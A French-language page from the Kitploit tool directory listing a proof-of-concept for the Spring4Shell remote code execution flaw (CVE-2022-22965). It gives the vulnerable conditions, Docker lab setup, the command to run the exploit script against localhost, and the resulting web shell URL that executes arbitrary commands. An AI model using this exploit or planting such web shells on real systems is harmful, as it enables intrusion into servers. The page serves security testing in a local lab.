Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Spring4shell-CVE-2022-22965-POC — Another spring4shell (Spring core RCE) POC | Kitploit
Outils/GitHubGitHub/netcode/spring4shell-cve-2022-22965-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubnetcode/spring4shell-cve-2022-22965-poc

Spring4shell-CVE-2022-22965-POC

Another spring4shell (Spring core RCE) POC

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
33il y a 4 ansPas encore vérifié

Vulnérabilité RCE Spring4shell

Cette vulnérabilité affecte Spring Core et permet à un attaquant d'envoyer une requête HTTP spécialement conçue pour contourner les protections du parseur de requêtes HTTP de la bibliothèque, menant à une exécution de code à distance.

Plus d'informations ici

Pour que cette vulnérabilité soit exploitée, plusieurs conditions doivent être remplies

  • Utiliser JDK 9 ou supérieur
  • Avoir Apache Tomcat comme conteneur de servlets
  • Être empaqueté en tant que WAR traditionnel (par opposition à un jar exécutable Spring Boot)
  • Utiliser la dépendance spring-webmvc ou spring-webflux
  • Utiliser les versions du framework Spring 5.3.0 à 5.3.17, 5.2.0 à 5.2.19, ou des versions plus anciennes

POC

  • Construire l'image Docker
root@kitploit:~
docker build . -t springshell-rce-poc
  • Exécuter le conteneur Docker
root@kitploit:~
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
  • Exécution de l'exploit
root@kitploit:~
python exploit-poc.py --url "http://127.0.0.1:8081/"

La réponse attendue

root@kitploit:~
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami

Si vous accédez à cette URL, elle exécutera la commande de votre choix cmd=<cequevousvoulez>

Si vous vous connectez en SSH au conteneur, vous verrez qu'un nouveau fichier a été créé tomcatwar.jsp

root@kitploit:~
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT
Télécharger l’outil